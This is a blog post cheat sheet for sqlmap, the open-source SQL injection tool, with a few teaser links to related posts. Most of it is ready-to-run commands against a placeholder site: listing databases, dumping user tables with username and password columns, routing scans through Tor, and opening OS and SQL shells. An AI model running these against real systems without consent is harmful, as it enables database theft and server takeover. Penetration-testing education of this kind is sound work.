Sqlmap Cheat Sheet Everything you need to know Ankit Chaubey, 19, June 202212, December 2022 SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.TABLE OF CONTENTS0.1 What is SQLMAP ?0.2 How to Download SQLMAP?0.2.0.1 Sqlmap tutorial step by step1 Disclaimer1.0.1 About The Author1.0.1.1 Ankit Chaubey1.0.2 RelatedWhat is SQLMAP ?sqlmap is an open source penetration testing tool that automates the process of discovering and exploiting SQL injection vulnerabilities and taking over database servers. It comes with a powerful search engine, tons of niche features for the ultimate penetration tester, database fingerprinting, data extraction from databases, basic file system access, and a wide range of switches to run commands from the operating system. . Out-of-band connection.How to Download SQLMAP?You can download the latest zipball or tarball.Preferably, you can download sqlmap by cloning the Git repository:git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devEasy Scanning optionsqlmap -u "http://testsite.com/login.php"Scanning by using torsqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5Scanning by manually setting the return timesqlmap -u "http://testsite.com/login.php" --time-sec 15List all databases at the sitesqlmap -u "http://testsite.com/login.php" --dbsList all tables in a specific databasesqlmap -u "http://testsite.com/login.php" -D site_db --tablesDump the contents of a DB tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users –dumpList all columns in a tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users --columnsDump only selected columnssqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dumpDump a table from a database when you have admin credentialssqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dumpGet OS Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shellGet SQL Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shellSqlmap tutorial step by stepDisclaimerUsage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.About The Author Ankit Chaubey See author's postsRelated Hacking Hacks kali Linux Cheat Sheetsql injectionsqlmap
Cyber Security What Is a Trojan Horse Types of Trojans Every Thing You Know 1, January 20231, January 2023The term Trojan actually has a much wider meaning than just computer viruses. A Trojan can be any program that performs a function that is different from what the user expects, or it can be something like a virus or other malware. Essentially, any program that runs on your computer… Read More
Cyber Security RapidScan: The Ultimate Multi-Tool Web Vulnerability Scanner 23, September 202323, September 2023Rapidscan is a web application vulnerability scanner built on Python that has several functionalities. This tool’s main objective is to detect all vulnerabilities through automation by running various scanning programmes to discover flaws. Because it runs several scanning technologies. It can effectively judge false positives and correlate data collectively, all… Read More
kali Linux How to Install Brave Browser on Kali Linux 28, August 202212, December 2022Brave is only supported on 64-bit AMD/Intel architectures (amd64 / x86_64).TABLE OF CONTENTS1 Release Channel Installation1.1 Installing Brave on Debian, Ubuntu, Mint1.2 Installing Brave on Fedora, CentOS Stream/RHEL1.3 Installing Brave on OpenSUSE1.4 Snap2 Beta Channel Installation2.1 Installing Brave on Debian, Ubuntu, Mint2.2 Installing Brave on Fedora, CentOS Stream/RHEL2.3 Installing Brave… Read More